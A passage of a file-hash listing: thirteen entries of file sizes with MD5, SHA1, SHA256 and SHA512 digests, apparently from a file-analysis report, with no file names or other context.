SHA512fe49f6f8a096e5192bfe73f2b5ce3ff087ed36111969cb19b1a5d4cd568783f2f7e62d541f46d3099521d9edf9d3f4816c4085b6d52d790d6008cc5e8c6205b2
-
Filesize
416KB
MD5620650bd9737354019dbf3ab01c3cfed
SHA13860fb5e20dffa65667f5280b72e9dccf7d6c525
SHA256c1054d39b231511e7117ad229bcaa608cee88e0ef6cde44d9a74216be38539d6
SHA512c79381c1f8c4c5565706271c140c4fb1d8b96359bd5bfdf3d9ee42ba82c94704843f420091f1db618a5b21e53e6f6854f3cfda6c43444164cf1352e84e8ff5de
-
Filesize
577KB
MD528b02359708af23efd19f3bd97183b92
SHA1e49b7415a78a35ed60e1b5506e0095650c06eb5f
SHA25617cd7398fc8b30f96feddcb22989ba1b9444ece1b6a41fd31a5cf1cf6168bb23
SHA51255b0de5ca1d59a057b6f414c3ec31d5eb5cf3b57a160c9d5bb8528b44ce58fbe9eeb458e11e11e35b8f3d702eac2d20a848dc7911c117fcd02ec4c06c2022250
-
Filesize
20KB
MD549e36d529659ce4a606c88532a3e7b32
SHA18b39a2cc50b1c416db2c46f9554cd55dd5d37234
SHA2569b60332b209a6c4e27702bf338210cbe50ef5bd3b587f9ebb16620720324e597
SHA51293167e07bd7f1f4afbd04be6447cb710f2e1e1b9a79359f00f048271ae4f98e0adf28a6be6b7b043b26562dbf71f790dd4c84dfcd5cc0e80def72267eb8762bd
-
Filesize
15KB
MD561b97387dba2ce31acdaf53967798db1
SHA1d132ae38f1a435daae8809a75c92ba4cc5308b27
SHA256ab2c9f6a540135ccf2f8eb8fdbcb51705ddd30159119e5dd09994eb26efd60b7
SHA512082fdc19c41490337f81433883bb3fb9bf957762d4e377b66c8e3d1a205c8bcf11b7254d9ab5640c2668d87eacc825ece42f7469131a95f1d0952b034f5d5933
-
Filesize
13KB
MD5d27afefb2d07fe2e22daa67cee06f82a
SHA10ee06abddd3a407a3eb97b6e52a5bf816c2a6aec
SHA256e594ff5dd5f3929df6c30c5f9ad28e69e57f85b2e56f49cebb8cd5c27970096b
SHA512b7149ab0e090cdc4e5ee2ce4611e8bf7faafc105d8852cb138be509ad2a3ed117283b6f5e40b27d30e955f6cc02d2467889fe74b7a2ae556b44ddec302b0bbae
-
Filesize
952KB
MD572cdcf02a8d78a2420a98e0333a1cb35
SHA139a2f22e8fa17e8bdcdc97a5de70f679972d404b
SHA2568ca375e4e2ef8786783e3ccb607541af66581f3662ff9c4ed3489a44dcd41faf
SHA512f435522436cfa1f73e2b488274ece2b8b339e72aa6cf053aa1cd890154f1a953d60cf03d1e6d3b09d5be93e3e38c3907220bae8c886b4e3ab4d70ae1fab8eb53
-
Filesize
13KB
MD51217fd079686576d6205403e77b1acd0
SHA1b171ca13b279f00be9ba13375fbae4b14ee1e1e5
SHA256c8749c5a78b288da6f159754c96e97df64d68b85953f40225ed0a90df8bb2899
SHA512b379d27c1c5cf772e8b823041576386fac71eadcccde034277138d677ee7e68027de2f304e153fbbc6c7e51ceff6ccca200f1dae84697e92a849de54f132448c
-
Filesize
522KB
MD587612af3af33bc853a240a98b9c7f4bc
SHA16a0d10ffd0ab6fa4a1bf44144f7c59a78e6da320
SHA256e74fd9e99fa009b201968c94ac583aea756ffbab286fec1fe07c1518db6c1a03
SHA51234c3f5a5286ac934b13a8b6c7cff6184307358b2ee396f73720a8e9ec85cd4d27aee6044e1cfb2b70ed26c1ef1be32e970c0226a1db6e5da990338dfb5d0a649
-
Filesize
19KB
MD51a4c12fabebade3c34c5001c5595ce7f
SHA1ba1bdfae42f597c114eaf4708fbb2804ef6342d0
SHA25676010672251ac9d7c5f926fa2e06750b2f56c0928846e2b459af6bf358a10611
SHA512abf2c802be741fdd8a16d30ed172aea0b0ba313edacabd71ba78c6732ca53cc8336e1f7d0b63030c204ae9ba3e61c5f893703f899b1a7f37c5de729b27e58680
-
Filesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
Filesize
652B
MD5472f32e53bca9fdcb7652773189cbf64
SHA10404ddee2139077ff11e574505a06b3a50a88772
SHA256cfcf3c292c1d27be7078128361ab670dbeb3a5f5265cb76c0be187558c8be1b5
SHA5128bd4e2a3dc7c1565d63528a104e26ab71b5c64e77934990f835766f07fecb40ff55d7913638b062b49fe623c8c02f70b62a09ae1e83d2160a9b96cd28eb63269
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD52609d3b423374e208a9f54c98f9165b9
SHA16e608c334672e735903fd1082aca968f819add11
SHA256583217a1bf51d58a70aed29815359bc7e77fac20b57b678d2af3fad2bfd7872e
SHA5127e12bba4b7be3a0ab2b1f66648bb2cefaa184eacb6b302a18683bafc42b30fa30be23b4c6b4780d5ae0cd0345e112221dc20269a7ad219b326b19a8653f9d663